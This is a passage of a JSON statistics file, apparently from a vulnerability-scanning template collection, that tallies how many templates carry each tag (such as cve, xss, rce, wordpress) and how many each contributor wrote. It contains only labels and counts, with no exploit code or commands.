+{"tags":[{"name":"cve","count":833},{"name":"lfi","count":342},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":240},{"name":"rce","count":214},{"name":"tech","count":196},{"name":"wp-plugin","count":175},{"name":"cve2020","count":165},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":96},{"name":"cve2018","count":92},{"name":"apache","count":73},{"name":"iot","count":70},{"name":"takeover","count":69},{"name":"oast","count":69},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":42},{"name":"sqli","count":40},{"name":"","count":38},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"oracle","count":36},{"name":"google","count":30},{"name":"logs","count":30},{"name":"cve2015","count":29},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"misconfig","count":22},{"name":"router","count":22},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"fuzz","count":14},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"jenkins","count":12},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"hp","count":10},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"kubernetes","count":9},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"backup","count":8},{"name":"ruijie","count":8},{"name":"airflow","count":8},{"name":"cve2008","count":8},{"name":"nginx","count":8},{"name":"microsoft","count":8},{"name":"ibm","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"cms","count":7},{"name":"jetty","count":6},{"name":"camera","count":6},{"name":"citrix","count":6},{"name":"django","count":6},{"name":"nodejs","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"laravel","count":6},{"name":"phpmyadmin","count":6},{"name":"lucee","count":6},{"name":"docker","count":6},{"name":"fileupload","count":6},{"name":"solr","count":6},{"name":"drupal","count":6},{"name":"headless","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"jolokia","count":5},{"name":"crlf","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"printer","count":5},{"name":"fatpipe","count":4},{"name":"exchange","count":4},{"name":"zabbix","count":4},{"name":"asp","count":4},{"name":"rfi","count":4},{"name":"amazon","count":4},{"name":"grafana","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"buffalo","count":4},{"name":"symfony","count":4},{"name":"vpn","count":4},{"name":"solarwinds","count":4},{"name":"firmware","count":4},{"name":"glpi","count":4},{"name":"zimbra","count":4},{"name":"proxy","count":4},{"name":"moodle","count":4},{"name":"symantec","count":4},{"name":"resin","count":4},{"name":"npm","count":4},{"name":"strapi","count":4},{"name":"artifactory","count":4},{"name":"slack","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"git","count":4},{"name":"webserver","count":4},{"name":"firebase","count":4},{"name":"thinkcmf","count":4},{"name":"keycloak","count":4},{"name":"elastic","count":4},{"name":"traversal","count":4},{"name":"search","count":3},{"name":"ssh","count":3},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"openam","count":3},{"name":"kafka","count":3},{"name":"smtp","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"cloud","count":3},{"name":"zhiyuan","count":3},{"name":"backdoor","count":3},{"name":"lansweeper","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"cves","count":3},{"name":"jeesns","count":3},{"name":"log","count":3},{"name":"nexus","count":3},{"name":"cacti","count":3},{"name":"ofbiz","count":3},{"name":"oa","count":3},{"name":"tikiwiki","count":3},{"name":"azure","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"terramaster","count":3},{"name":"github","count":3},{"name":"lfr","count":3},{"name":"hoteldruid","count":3},{"name":"kevinlab","count":3},{"name":"httpd","count":3},{"name":"opensis","count":3},{"name":"springcloud","count":3},{"name":"nosqli","count":3},{"name":"linkerd","count":3},{"name":"injection","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"node","count":3},{"name":"exposures","count":3},{"name":"fpd","count":3},{"name":"prometheus","count":3},{"name":"itop","count":3},{"name":"bitrix","count":3},{"name":"targa","count":3},{"name":"druid","count":3},{"name":"mongodb","count":3},{"name":"ebs","count":3},{"name":"bigip","count":3},{"name":"mail","count":3},{"name":"cve2007","count":3},{"name":"aviatrix","count":2},{"name":"icewarp","count":2},{"name":"yapi","count":2},{"name":"webcam","count":2},{"name":"chyrp","count":2},{"name":"paloalto","count":2},{"name":"prtg","count":2},{"name":"voipmonitor","count":2},{"name":"mailchimp","count":2},{"name":"idrac","count":2},{"name":"text","count":2},{"name":"bitly","count":2},{"name":"nagios","count":2},{"name":"fortios","count":2},{"name":"upload","count":2},{"name":"commax","count":2},{"name":"odoo","count":2},{"name":"dolibarr","count":2},{"name":"activemq","count":2},{"name":"maian","count":2},{"name":"globalprotect","count":2},{"name":"openvpn","count":2},{"name":"ilo","count":2},{"name":"netis","count":2},{"name":"hasura","count":2},{"name":"hostheader-injection","count":2},{"name":"favicon","count":2},{"name":"vcenter","count":2},{"name":"rockmongo","count":2},{"name":"liferay","count":2},{"name":"spark","count":2},{"name":"netsweeper","count":2},{"name":"storage","count":2},{"name":"jboss","count":2},{"name":"nextjs","count":2},{"name":"wuzhicms","count":2},{"name":"openfire","count":2},{"name":"natshell","count":2},{"name":"jsf","count":2},{"name":"s3","count":2},{"name":"db","count":2},{"name":"huawei","count":2},{"name":"dos","count":2},{"name":"axis2","count":2},{"name":"cve2005","count":2},{"name":"places","count":2},{"name":"plesk","count":2},{"name":"embed","count":2},{"name":"justwriting","count":2},{"name":"sitecore","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"splunk","count":2},{"name":"qihang","count":2},{"name":"hashicorp","count":2},{"name":"waf","count":2},{"name":"adminer","count":2},{"name":"yii","count":2},{"name":"sharepoint","count":2},{"name":"chamilo","count":2},{"name":"service","count":2},{"name":"oauth","count":2},{"name":"axis","count":2},{"name":"trixbox","count":2},{"name":"chiyu","count":2},{"name":"getsimple","count":2},{"name":"kong","count":2},{"name":"aruba","count":2},{"name":"couchdb","count":2},{"name":"showdoc","count":2},{"name":"geowebserver","count":2},{"name":"backups","count":2},{"name":"mcafee","count":2},{"name":"hpe","count":2},{"name":"totemomail","count":2},{"name":"lotus","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"vrealize","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"bucket","count":2},{"name":"harbor","count":2},{"name":"leak","count":2},{"name":"phpcollab","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"rstudio","count":2},{"name":"horde","count":2},{"name":"heroku","count":2},{"name":"bypass","count":2},{"name":"smb","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"enumeration","count":2},{"name":"seeyon","count":2},{"name":"ucmdb","count":2},{"name":"mida","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"guacamole","count":2},{"name":"payara","count":2},{"name":"electron","count":2},{"name":"hjtcloud","count":2},{"name":"ec2","count":2},{"name":"linux","count":2},{"name":"ecoa","count":2},{"name":"akkadian","count":2},{"name":"rancher","count":2},{"name":"grav","count":2},{"name":"jeedom","count":2},{"name":"minio","count":2},{"name":"frp","count":2},{"name":"shellshock","count":2},{"name":"tidb","count":2},{"name":"bruteforce","count":2},{"name":"status","count":2},{"name":"pega","count":2},{"name":"avantfax","count":2},{"name":"prestashop","count":2},{"name":"nextcloud","count":2},{"name":"middleware","count":2},{"name":"xxljob","count":2},{"name":"interlib","count":1},{"name":"memcached","count":1},{"name":"avtech","count":1},{"name":"nps","count":1},{"name":"apiman","count":1},{"name":"syslog","count":1},{"name":"wondercms","count":1},{"name":"novnc","count":1},{"name":"linkedin","count":1},{"name":"directions","count":1},{"name":"instagram","count":1},{"name":"parentlink","count":1},{"name":"nimble","count":1},{"name":"dom","count":1},{"name":"axiom","count":1},{"name":"74cms","count":1},{"name":"qsan","count":1},{"name":"b2evolution","count":1},{"name":"geddy","count":1},{"name":"domxss","count":1},{"name":"panabit","count":1},{"name":"tpshop","count":1},{"name":"perl","count":1},{"name":"buildkite","count":1},{"name":"shopizer","count":1},{"name":"st","count":1},{"name":"sureline","count":1},{"name":"mantisbt","count":1},{"name":"moin","count":1},{"name":"clockwork","count":1},{"name":"openemr","count":1},{"name":"zmanda","count":1},{"name":"embedthis","count":1},{"name":"moinmoin","count":1},{"name":"exacqvision","count":1},{"name":"xmlchart","count":1},{"name":"cve2006","count":1},{"name":"kerbynet","count":1},{"name":"beanshell","count":1},{"name":"websvn","count":1},{"name":"codemeter","count":1},{"name":"youtube","count":1},{"name":"wooyun","count":1},{"name":"zms","count":1},{"name":"woocommerce","count":1},{"name":"details","count":1},{"name":"yealink","count":1},{"name":"nsasg","count":1},{"name":"daybyday","count":1},{"name":"openweather","count":1},{"name":"mantis","count":1},{"name":"synnefo","count":1},{"name":"mpsec","count":1},{"name":"expose","count":1},{"name":"wifisky","count":1},{"name":"placeos","count":1},{"name":"clickhouse","count":1},{"name":"cgi","count":1},{"name":"geocode","count":1},{"name":"shopware","count":1},{"name":"azkaban","count":1},{"name":"jnoj","count":1},{"name":"mongoshake","count":1},{"name":"ioncube","count":1},{"name":"csrf","count":1},{"name":"burp","count":1},{"name":"opensmtpd","count":1},{"name":"traefik","count":1},{"name":"empirecms","count":1},{"name":"pippoint","count":1},{"name":"setup","count":1},{"name":"ambari","count":1},{"name":"smartsense","count":1},{"name":"emby","count":1},{"name":"actuator","count":1},{"name":"skycaiji","count":1},{"name":"omi","count":1},{"name":"darkstat","count":1},{"name":"soar","count":1},{"name":"iterable","count":1},{"name":"rujjie","count":1},{"name":"beanstalk","count":1},{"name":"cors","count":1},{"name":"xiuno","count":1},{"name":"nexusdb","count":1},{"name":"find","count":1},{"name":"wavlink","count":1},{"name":"jumpcloud","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"cve202","count":1},{"name":"dvr","count":1},{"name":"clink-office","count":1},{"name":"floc","count":1},{"name":"landray","count":1},{"name":"weglot","count":1},{"name":"rmi","count":1},{"name":"spectracom","count":1},{"name":"lighttpd","count":1},{"name":"bingmaps","count":1},{"name":"shopxo","count":1},{"name":"phpinfo","count":1},{"name":"iptime","count":1},{"name":"skywalking","count":1},{"name":"square","count":1},{"name":"feifeicms","count":1},{"name":"minimouse","count":1},{"name":"mobileiron","count":1},{"name":"phpfusion","count":1},{"name":"labtech","count":1},{"name":"fortigates","count":1},{"name":"vsftpd","count":1},{"name":"spip","count":1},{"name":"livezilla","count":1},{"name":"tectuus","count":1},{"name":"haproxy","count":1},{"name":"postmark","count":1},{"name":"loqate","count":1},{"name":"tjws","count":1},{"name":"pmb","count":1},{"name":"ewebs","count":1},{"name":"lanproxy","count":1},{"name":"tor","count":1},{"name":"codeigniter","count":1},{"name":"xvr","count":1},{"name":"visualstudio","count":1},{"name":"gilacms","count":1},{"name":"fastapi","count":1},{"name":"sophos","count":1},{"name":"contentkeeper","count":1},{"name":"kyan","count":1},{"name":"hiawatha","count":1},{"name":"gunicorn","count":1},{"name":"mautic","count":1},{"name":"oscommerce","count":1},{"name":"qvisdvr","count":1},{"name":"rdp","count":1},{"name":"redwood","count":1},{"name":"maxsite","count":1},{"name":"zend","count":1},{"name":"svnserve","count":1},{"name":"etherpad","count":1},{"name":"maccmsv10","count":1},{"name":"craftcms","count":1},{"name":"roads","count":1},{"name":"expressjs","count":1},{"name":"szhe","count":1},{"name":"fortinet","count":1},{"name":"fortilogger","count":1},{"name":"bookstack","count":1},{"name":"ueditor","count":1},{"name":"ssl","count":1},{"name":"cofax","count":1},{"name":"twitter-server","count":1},{"name":"alertmanager","count":1},{"name":"ntopng","count":1},{"name":"database","count":1},{"name":"commscope","count":1},{"name":"arl","count":1},{"name":"javamelody","count":1},{"name":"cobub","count":1},{"name":"faraday","count":1},{"name":"monitorix","count":1},{"name":"circle","count":1},{"name":"email","count":1},{"name":"office365","count":1},{"name":"travis","count":1},{"name":"dbeaver","count":1},{"name":"upnp","count":1},{"name":"buttercms","count":1},{"name":"gitea","count":1},{"name":"owasp","count":1},{"name":"esmtp","count":1},{"name":"monitorr","count":1},{"name":"okiko","count":1},{"name":"trane","count":1},{"name":"blue-ocean","count":1},{"name":"totaljs","count":1},{"name":"varnish","count":1},{"name":"nedi","count":1},{"name":"doh","count":1},{"name":"secmail","count":1},{"name":"tapestry","count":1},{"name":"lokalise","count":1},{"name":"myucms","count":1},{"name":"lutron","count":1},{"name":"smi","count":1},{"name":"sar2html","count":1},{"name":"xml","count":1},{"name":"bing","count":1},{"name":"nc2","count":1},{"name":"keenetic","count":1},{"name":"distance","count":1},{"name":"etouch","count":1},{"name":"sonarcloud","count":1},{"name":"sendgrid","count":1},{"name":"loganalyzer","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"cherokee","count":1},{"name":"rsyncd","count":1},{"name":"fuelcms","count":1},{"name":"calendarix","count":1},{"name":"centos","count":1},{"name":"playable","count":1},{"name":"k8s","count":1},{"name":"spotify","count":1},{"name":"spidercontrol","count":1},{"name":"elevation","count":1},{"name":"tieline","count":1},{"name":"kindeditor","count":1},{"name":"pcoip","count":1},{"name":"phpfastcache","count":1},{"name":"triconsole","count":1},{"name":"sidekiq","count":1},{"name":"natemail","count":1},{"name":"jquery","count":1},{"name":"grails","count":1},{"name":"pihole","count":1},{"name":"chevereto","count":1},{"name":"tugboat","count":1},{"name":"scimono","count":1},{"name":"messaging","count":1},{"name":"nette","count":1},{"name":"optiLink","count":1},{"name":"netrc","count":1},{"name":"idemia","count":1},{"name":"ns","count":1},{"name":"opencast","count":1},{"name":"visualtools","count":1},{"name":"yachtcontrol","count":1},{"name":"alerta","count":1},{"name":"zcms","count":1},{"name":"pacsone","count":1},{"name":"pgadmin","count":1},{"name":"nuuo","count":1},{"name":"centreon","count":1},{"name":"lotuscms","count":1},{"name":"webui","count":1},{"name":"sqlite","count":1},{"name":"spring","count":1},{"name":"salesforce","count":1},{"name":"okta","count":1},{"name":"gridx","count":1},{"name":"cocoon","count":1},{"name":"opentsdb","count":1},{"name":"api-manager","count":1},{"name":"tenda","count":1},{"name":"zarafa","count":1},{"name":"listserv","count":1},{"name":"kubeflow","count":1},{"name":"mrtg","count":1},{"name":"goahead","count":1},{"name":"saltapi","count":1},{"name":"timesheet","count":1},{"name":"cves2001","count":1},{"name":"flink","count":1},{"name":"fortiweb","count":1},{"name":"exponentcms","count":1},{"name":"clockwatch","count":1},{"name":"ruckus","count":1},{"name":"woocomernce","count":1},{"name":"rubedo","count":1},{"name":"dvwa","count":1},{"name":"mailgun","count":1},{"name":"graphql","count":1},{"name":"zm","count":1},{"name":"graph","count":1},{"name":"trilithic","count":1},{"name":"glowroot","count":1},{"name":"javafaces","count":1},{"name":"netgenie","count":1},{"name":"miscrsoft","count":1},{"name":"werkzeug","count":1},{"name":"openrestry","count":1},{"name":"rabbitmq","count":1},{"name":"ognl","count":1},{"name":"asana","count":1},{"name":"scs","count":1},{"name":"owa","count":1},{"name":"k8","count":1},{"name":"solarlog","count":1},{"name":"cloudinary","count":1},{"name":"wakatime","count":1},{"name":"fortigate","count":1},{"name":"xunchi","count":1},{"name":"springframework","count":1},{"name":"timezone","count":1},{"name":"proftpd","count":1},{"name":"redcap","count":1},{"name":"expn","count":1},{"name":"netdata","count":1},{"name":"cscart","count":1},{"name":"bedita","count":1},{"name":"qdpm","count":1},{"name":"sourcebans","count":1},{"name":"blind","count":1},{"name":"wmt","count":1},{"name":"karel","count":1},{"name":"majordomo2","count":1},{"name":"stem","count":1},{"name":"cloudflare","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1},{"name":"ecom","count":1},{"name":"gateone","count":1},{"name":"place","count":1},{"name":"svn","count":1},{"name":"vsphere","count":1},{"name":"raspap","count":1},{"name":"sco","count":1},{"name":"phpwiki","count":1},{"name":"meraki","count":1},{"name":"rockethchat","count":1},{"name":"selea","count":1},{"name":"nifi","count":1},{"name":"asus","count":1},{"name":"argussurveillance","count":1},{"name":"flexbe","count":1},{"name":"ilo4","count":1},{"name":"node-red-dashboard","count":1},{"name":"limit","count":1},{"name":"episerver","count":1},{"name":"fcm","count":1},{"name":"htmli","count":1},{"name":"stripe","count":1},{"name":"thinkadmin","count":1},{"name":"magicflow","count":1},{"name":"sarg","count":1},{"name":"dotclear","count":1},{"name":"vnc","count":1},{"name":"jsp","count":1},{"name":"razor","count":1},{"name":"pendo","count":1},{"name":"duomicms","count":1},{"name":"processmaker","count":1},{"name":"ruby","count":1},{"name":"starttls","count":1},{"name":"phpunit","count":1},{"name":"gurock","count":1},{"name":"wazuh","count":1},{"name":"fastcgi","count":1},{"name":"terraform","count":1},{"name":"lancom","count":1},{"name":"hadoop","count":1},{"name":"pivotaltracker","count":1},{"name":"biometrics","count":1},{"name":"javascript","count":1},{"name":"mapbox","count":1},{"name":"mod-proxy","count":1},{"name":"openstack","count":1},{"name":"websphere","count":1},{"name":"klog","count":1},{"name":"concrete","count":1},{"name":"rocketchat","count":1},{"name":"turbocrm","count":1},{"name":"phpshowtime","count":1},{"name":"checkpoint","count":1},{"name":"smartblog","count":1},{"name":"pyramid","count":1},{"name":"nomad","count":1},{"name":"dropbox","count":1},{"name":"wamp","count":1},{"name":"digitalocean","count":1},{"name":"netmask","count":1},{"name":" default-login","count":1},{"name":"mkdocs","count":1},{"name":"webmodule-ee","count":1},{"name":"metinfo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"panos","count":1},{"name":"manager","count":1},{"name":"deviantart","count":1},{"name":"redmine","count":1},{"name":"zeroshell","count":1},{"name":"whm","count":1},{"name":"sangfor","count":1},{"name":"myvuehelp","count":1},{"name":"achecker","count":1},{"name":"auth","count":1},{"name":"apos","count":1},{"name":"openx","count":1},{"name":"discord","count":1},{"name":"camunda","count":1},{"name":"eyelock","count":1},{"name":"sentry","count":1},{"name":"tcexam","count":1},{"name":"dnssec","count":1},{"name":"adb","count":1},{"name":"ems","count":1},{"name":"rmc","count":1},{"name":"comodo","count":1},{"name":"imap","count":1},{"name":"h3c-imc","count":1},{"name":"basic-auth","count":1},{"name":"anchorcms","count":1},{"name":"discourse","count":1},{"name":"mara","count":1},{"name":"photo","count":1},{"name":"plugin","count":1},{"name":"froxlor","count":1},{"name":"postgres","count":1},{"name":"shiro","count":1},{"name":"servicedesk","count":1},{"name":"blackboard","count":1},{"name":"opm","count":1},{"name":"nerdgraph","count":1},{"name":"bigbluebutton","count":1},{"name":"jenkin","count":1},{"name":"yzmcms","count":1},{"name":"remkon","count":1},{"name":"eprints","count":1},{"name":"cloudron","count":1},{"name":"oneblog","count":1},{"name":"weiphp","count":1},{"name":"openerp","count":1},{"name":"emc","count":1},{"name":"jeewms","count":1},{"name":"matrix","count":1},{"name":"phalcon","count":1},{"name":"octoprint","count":1},{"name":"pulsesecure","count":1},{"name":"landrayoa","count":1},{"name":"circontrol","count":1},{"name":"metabase","count":1},{"name":"sage","count":1},{"name":"aspnuke","count":1},{"name":"jitsi","count":1},{"name":"mirai","count":1},{"name":"mediumish","count":1},{"name":"wiki","count":1},{"name":"vidyo","count":1},{"name":"clave","count":1},{"name":"diris","count":1},{"name":"clusterengine","count":1},{"name":"dompdf","count":1},{"name":"sceditor","count":1},{"name":"cockpit","count":1},{"name":"robomongo","count":1},{"name":"extractor","count":1},{"name":"twitter","count":1},{"name":"powercreator","count":1},{"name":"seacms","count":1},{"name":"cse","count":1},{"name":"iceflow","count":1},{"name":"nearby","count":1},{"name":"postmessage","count":1},{"name":"sql","count":1},{"name":"appweb","count":1},{"name":"ganglia","count":1},{"name":"route","count":1},{"name":"simplecrm","count":1},{"name":"gogs","count":1},{"name":"tileserver","count":1},{"name":"ulterius","count":1},{"name":"ghost","count":1},{"name":"webftp","count":1},{"name":"jaspersoft","count":1},{"name":"luftguitar","count":1},{"name":"jmx","count":1},{"name":"streetview","count":1},{"name":"chinaunicom","count":1},{"name":"webadmin","count":1},{"name":"influxdb","count":1},{"name":"tensorboard","count":1},{"name":"sprintful","count":1},{"name":"shoretel","count":1},{"name":"huijietong","count":1},{"name":"newrelic","count":1},{"name":"eg","count":1},{"name":"primetek","count":1},{"name":"webmin","count":1},{"name":"circontrorl","count":1},{"name":"frontpage","count":1},{"name":"zookeeper","count":1},{"name":"gstorage","count":1},{"name":"pagespeed","count":1},{"name":"viewlinc","count":1},{"name":"octobercms","count":1},{"name":"sgp","count":1},{"name":"nuxeo","count":1},{"name":"circleci","count":1},{"name":"visionhub","count":1},{"name":"bullwark","count":1},{"name":"wavemaker","count":1},{"name":"panasonic","count":1},{"name":"realteo","count":1},{"name":"ssltls","count":1},{"name":"artica","count":1},{"name":"wildfly","count":1},{"name":"bazarr","count":1},{"name":"subrion","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"nordex","count":1},{"name":"tinypng","count":1},{"name":"autocomplete","count":1},{"name":"swagger","count":1},{"name":"socomec","count":1},{"name":"fiori","count":1},{"name":"package","count":1},{"name":"alibaba","count":1},{"name":"portainer","count":1},{"name":"mongo","count":1},{"name":"mdb","count":1},{"name":"ricoh","count":1},{"name":"oidc","count":1},{"name":"csrfguard","count":1},{"name":"rhymix","count":1},{"name":"key","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"vscode","count":1},{"name":"tamronos","count":1},{"name":"eyou","count":1},{"name":"calendly","count":1},{"name":"solman","count":1},{"name":"hubspot","count":1},{"name":"ipstack","count":1},{"name":"zenario","count":1},{"name":"mysql","count":1},{"name":"zyxel","count":1},{"name":"elfinder","count":1},{"name":"gotmls","count":1},{"name":"locations","count":1},{"name":"hiboss","count":1},{"name":"krweb","count":1},{"name":"drone","count":1},{"name":"aura","count":1},{"name":"olivetti","count":1},{"name":"gitlist","count":1},{"name":"cerebro","count":1},{"name":"mariadb","count":1},{"name":"elascticsearch","count":1},{"name":"accela","count":1},{"name":"acme","count":1},{"name":"bolt","count":1},{"name":"acexy","count":1},{"name":"motorola","count":1},{"name":"graylog","count":1},{"name":"erp-nc","count":1},{"name":"viewpoint","count":1},{"name":"xampp","count":1},{"name":"dotnet","count":1},{"name":"logontracer","count":1},{"name":"plone","count":1},{"name":"redhat","count":1},{"name":"geutebruck","count":1},{"name":"tongda","count":1},{"name":"addpac","count":1},{"name":"linksys","count":1},{"name":"gespage","count":1},{"name":"speed","count":1},{"name":"hortonworks","count":1},{"name":"jenzabar","count":1},{"name":"kafdrop","count":1},{"name":"zzzcms","count":1},{"name":"weather","count":1},{"name":"adiscon","count":1},{"name":"servicenow","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"tensorflow","count":1},{"name":"csod","count":1},{"name":"dotnetnuke","count":1},{"name":"elasticsearch","count":1},{"name":"graphite","count":1},{"name":"zte","count":1},{"name":"glances","count":1},{"name":"default","count":1},{"name":"opensns","count":1},{"name":"shoppable","count":1},{"name":"uwsgi","count":1},{"name":"testrail","count":1},{"name":"couchbase","count":1},{"name":"plastic","count":1},{"name":"pagerduty","count":1},{"name":"gloo","count":1},{"name":"gsoap","count":1},{"name":"finereport","count":1},{"name":"bash","count":1},{"name":"lg-nas","count":1},{"name":"geolocation","count":1},{"name":"wing-ftp","count":1},{"name":"resourcespace","count":1},{"name":"nweb2fax","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":279},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"xelkomy","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":5},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"idealphase","count":3},{"name":"shine","count":3},{"name":"me9187","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"johnjhacking","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"sushantkamble","count":3},{"name":"vsh00t","count":3},{"name":"_generic_human_","count":3},{"name":"binaryfigments","count":3},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"davidmckennirey","count":2},{"name":"bernardofsr","count":2},{"name":"0xelkomy","count":2},{"name":"random-robbie","count":2},{"name":"swissky","count":2},{"name":"arcc","count":2},{"name":"hetroublemakr","count":2},{"name":"vavkamil","count":2},{"name":"r12w4n","count":2},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"randomrobbie","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"x1m_martijn","count":2},{"name":"amsda","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"koti2","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"kiblyn11","count":2},{"name":"convisoappsec","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"w4cky_","count":2},{"name":"alifathi-h1","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"cocxanh","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"gal nagli","count":2},{"name":"moritz nentwig","count":2},{"name":"ajaysenr","count":1},{"name":"un-fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"rodnt","count":1},{"name":"borna nematzadeh","count":1},{"name":"brabbit10","count":1},{"name":"nerrorsec","count":1},{"name":"regala_","count":1},{"name":"@ofjaaah","count":1},{"name":"akash.c","count":1},{"name":"ahmetpergamum","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"geraldino2","count":1},{"name":"izn0u","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"aaron_costello 